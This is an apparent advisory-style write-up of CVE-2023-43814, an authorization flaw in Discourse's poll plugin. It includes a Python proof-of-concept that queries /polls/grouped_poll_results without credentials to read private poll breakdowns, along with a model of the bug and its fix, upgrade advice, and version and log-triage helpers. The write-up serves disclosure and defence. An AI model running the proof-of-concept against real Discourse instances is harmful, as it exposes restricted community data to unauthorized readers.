Discourse is a widely deployed open-source community discussion platform, and polls are one of its most used plugin features. A security vulnerability in that plugin, tracked as CVE-2023-43814, allowed the results of polls that were meant to be visible only to authorized users to be read by anyone who could reach a single endpoint.

Summary of the Vulnerability

The vulnerability is in the poll plugin's /polls/grouped_poll_results endpoint, which returns the text of each poll option together with the number of votes per group of participants (the breakdown of votes by a user field). The endpoint served this data without enforcing that the requester was authorized to see the post that contains the poll, so an unauthenticated or otherwise unauthorized user could read the grouped results of polls in private topics. For polls whose results are meant only for a restricted audience, that is a direct information disclosure.

Exploit Details

The following proof-of-concept request shows how the missing authorization check could be used to read poll details without any session: it simply calls the endpoint as an anonymous client.

import requests


def exploit_discourse_poll_results(discourse_base_url, post_id, poll_name, user_field_name):
    # The endpoint takes the id of the post that contains the poll, the poll's
    # name and the user field to group voters by. No session cookie is sent,
    # so on an unpatched instance the request is served to an anonymous user.
    payload = {
        "post_id": post_id,
        "poll_name": poll_name,
        "user_field_name": user_field_name,
    }

    try:
        response = requests.get(
            url=f"{discourse_base_url}/polls/grouped_poll_results",
            params=payload,
            timeout=10,
        )
    except requests.RequestException as e:
        print(f"Error while requesting Discourse poll results: {e}")
        return None

    if response.status_code == 200:
        print("Poll results retrieved successfully!")
        print(response.json())
        return response.json()

    print(f"Failed to retrieve poll results (HTTP {response.status_code})")
    return None


if __name__ == "__main__":
    discourse_instance = "https://YOUR-DISCOURSE-INSTANCE-URL"
    target_post_id = "12345"          # id of the post that contains the poll
    target_poll_name = "poll"         # "poll" is the name Discourse gives an unnamed poll
    group_by_field = "YOUR-USER-FIELD"  # name of a user field to group votes by
    exploit_discourse_poll_results(discourse_instance, target_post_id, target_poll_name, group_by_field)

On an unpatched instance the request succeeds without any credentials and the script prints the grouped results, including the option texts and per-group vote counts; on a patched instance the server rejects the request and nothing is printed.
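To make the class of bug concrete, here is a small Python model of the endpoint's authorization problem. It is an added example written for this page, not Discourse's own Ruby code: the users, groups, posts and votes are a constructed fixture, the guardian-style can_see_post check is a simplified stand-in for Discourse's real permission logic, and the two handler functions contrast serving grouped results straight from a post id with authorizing against the containing post first (the shape of the fix, not a reproduction of the actual patch).

```python
"""Model of the missing authorization check behind CVE-2023-43814.

Added example, not Discourse code. The data model (categories readable by
groups, posts in those categories, votes tagged with a user field) and the
function names are constructed for illustration.
"""
from collections import defaultdict
from dataclasses import dataclass, field


@dataclass
class User:
    name: str
    groups: set = field(default_factory=set)
    fields: dict = field(default_factory=dict)   # e.g. {"department": "eng"}


@dataclass
class Post:
    post_id: int
    read_groups: set   # groups allowed to read the post's category; empty = public


@dataclass
class Poll:
    post_id: int
    name: str
    options: dict      # option id -> option text
    votes: dict        # voter name -> option id


ANONYMOUS = None
STAFF_GROUPS = {"admins"}


def can_see_post(user, post):
    """Guardian-style check: public posts are visible to everyone,
    restricted posts only to members of an allowed group (or admins)."""
    if not post.read_groups:
        return True
    if user is None:
        return False
    return bool(user.groups & (post.read_groups | STAFF_GROUPS))


def _aggregate(poll, users_by_name, user_field_name):
    """Group votes by a user field value: {field value: {option text: count}}."""
    grouped = defaultdict(lambda: defaultdict(int))
    for voter, option_id in poll.votes.items():
        key = users_by_name[voter].fields.get(user_field_name, "unknown")
        grouped[key][poll.options[option_id]] += 1
    return {k: dict(v) for k, v in grouped.items()}


def grouped_poll_results_vulnerable(current_user, post_id, poll_name, user_field_name, db):
    """Pre-fix shape: look the poll up by post id and return the breakdown
    without ever asking whether current_user may see that post."""
    poll = db["polls"][(post_id, poll_name)]
    return _aggregate(poll, db["users"], user_field_name)


def grouped_poll_results_fixed(current_user, post_id, poll_name, user_field_name, db):
    """Hardened shape: authorize against the parent post before touching poll data."""
    post = db["posts"].get(post_id)
    if post is None or not can_see_post(current_user, post):
        # One error for "does not exist" and "not allowed", so the endpoint
        # cannot be used to enumerate which private post ids carry polls.
        raise PermissionError("post not found or not visible")
    poll = db["polls"].get((post_id, poll_name))
    if poll is None:
        raise LookupError("no such poll on this post")
    return _aggregate(poll, db["users"], user_field_name)


def sample_db():
    """Constructed fixture: a poll inside a staff-only category."""
    users = {
        "alice": User("alice", {"staff"}, {"department": "eng"}),
        "bob": User("bob", {"staff"}, {"department": "eng"}),
        "carol": User("carol", {"staff"}, {"department": "sales"}),
        "mallory": User("mallory", set(), {"department": "eng"}),
    }
    posts = {42: Post(42, read_groups={"staff"})}
    polls = {(42, "budget"): Poll(42, "budget",
                                  options={"a": "Cut", "b": "Hold"},
                                  votes={"alice": "a", "bob": "b", "carol": "a"})}
    return {"users": users, "posts": posts, "polls": polls}


if __name__ == "__main__":
    db = sample_db()
    print("vulnerable, anonymous:", grouped_poll_results_vulnerable(ANONYMOUS, 42, "budget", "department", db))
    try:
        grouped_poll_results_fixed(ANONYMOUS, 42, "budget", "department", db)
    except PermissionError as e:
        print("fixed, anonymous:", e)
    print("fixed, staff member:", grouped_poll_results_fixed(db["users"]["alice"], 42, "budget", "department", db))
```

The point of the model is where the check sits: the grouped results are derived data, so the authorization decision has to be made against the object they derive from (the post), and before any of the poll's rows are read.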

Solution

To fix this vulnerability, upgrade Discourse to 3.1.1 stable or 3.2.0.beta2 (or later on either line). Read the upgrade instructions specific to your deployment and back up your existing data before proceeding. All affected installations should upgrade as soon as possible to protect their private poll results.
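Two checks a practitioner would want after reading this: whether a given instance's version falls inside the affected range, and whether the endpoint served successful responses before the upgrade. The helper below is an added example, not a Discourse tool: the fixed versions come from the advisory, the ordering of stable versus beta versions is my reading of Discourse's X.Y.Z / X.Y.Z.betaN scheme, and the nginx-style access-log lines are constructed for the example.

```python
"""Triage helpers for CVE-2023-43814 (added example, not Discourse tooling).

Fixed versions per the advisory: 3.1.1 stable and 3.2.0.beta2. The version
ordering assumes Discourse's "X.Y.Z" / "X.Y.Z.betaN" scheme, and the
access-log sample below is constructed, not captured from a real server.
"""
import re
from urllib.parse import parse_qsl

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:\.beta(\d+))?$")


def version_key(version):
    """Sort key (major, minor, patch, is_stable, beta_number).

    A stable release ranks above every beta of the same X.Y.Z, which is how
    the release lines are ordered (3.1.0.beta7 < 3.1.0 < 3.1.1).
    """
    m = _VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised Discourse version: {version!r}")
    major, minor, patch, beta = m.groups()
    if beta is None:
        return (int(major), int(minor), int(patch), 1, 0)
    return (int(major), int(minor), int(patch), 0, int(beta))


FIXED_STABLE = version_key("3.1.1")
FIXED_BETA = version_key("3.2.0.beta2")


def is_affected(version):
    """True if the version predates the fix on its own release line."""
    key = version_key(version)
    if key >= (3, 2, 0, 0, 0):
        # 3.2 line: 3.2.0.beta1 lacks the fix, 3.2.0.beta2 and later have it.
        return key < FIXED_BETA
    # 3.1 stable line and everything older: fixed from 3.1.1 onwards.
    return key < FIXED_STABLE


# nginx "combined" style line: ip ident user [time] "METHOD path proto" status size ...
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
ENDPOINT = "/polls/grouped_poll_results"


def successful_endpoint_hits(lines):
    """(ip, time, post_id, poll_name) for every HTTP 200 from the endpoint.

    The combined log carries no session information, so this only narrows
    the search: a 200 for a post in a restricted category, served while the
    instance was unpatched, is a leak to whoever made that request.
    """
    hits = []
    for line in lines:
        m = _LOG_RE.match(line)
        if not m or m.group("status") != "200":
            continue
        path, _, query = m.group("path").partition("?")
        if path != ENDPOINT:
            continue
        params = dict(parse_qsl(query))
        hits.append((m.group("ip"), m.group("time"),
                     params.get("post_id"), params.get("poll_name")))
    return hits


# Constructed sample: one client walking post ids from 203.0.113.7.
SAMPLE_LOG = """\
203.0.113.7 - - [17/Oct/2023:10:01:02 +0000] "GET /polls/grouped_poll_results?post_id=42&poll_name=budget&user_field_name=department HTTP/1.1" 200 318 "-" "python-requests/2.31.0"
198.51.100.3 - - [17/Oct/2023:10:01:09 +0000] "GET /t/roadmap/17 HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
203.0.113.7 - - [17/Oct/2023:10:01:15 +0000] "GET /polls/grouped_poll_results?post_id=43&poll_name=budget&user_field_name=department HTTP/1.1" 403 61 "-" "python-requests/2.31.0"
203.0.113.7 - - [17/Oct/2023:10:02:40 +0000] "GET /polls/grouped_poll_results?post_id=44&poll_name=hiring&user_field_name=department HTTP/1.1" 200 402 "-" "python-requests/2.31.0"
"""


if __name__ == "__main__":
    for v in ("3.1.0", "3.1.1", "3.2.0.beta1", "3.2.0.beta2"):
        print(v, "affected" if is_affected(v) else "patched")
    for hit in successful_endpoint_hits(SAMPLE_LOG.splitlines()):
        print("200 from endpoint:", hit)
```

The version check treats each release line separately because 3.2.0.beta1 is newer than 3.1.1 yet still lacks the fix; a plain "greater than 3.1.1" comparison would wrongly report it as patched.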

Original References

- Discourse CVE detailed report
- Discourse 3.1.1 stable release notes
- Discourse 3.2.0.beta2 release notes

Please find the original references above for more detailed information regarding this CVE and the specific changes in the patched versions of Discourse. Stay vigilant in monitoring the evolving security landscape and keeping your software up-to-date to maintain the privacy and integrity of your community discussions.

Timeline

Published on: 10/16/2023 22:15:12 UTC
Last modified on: 10/20/2023 17:48:38 UTC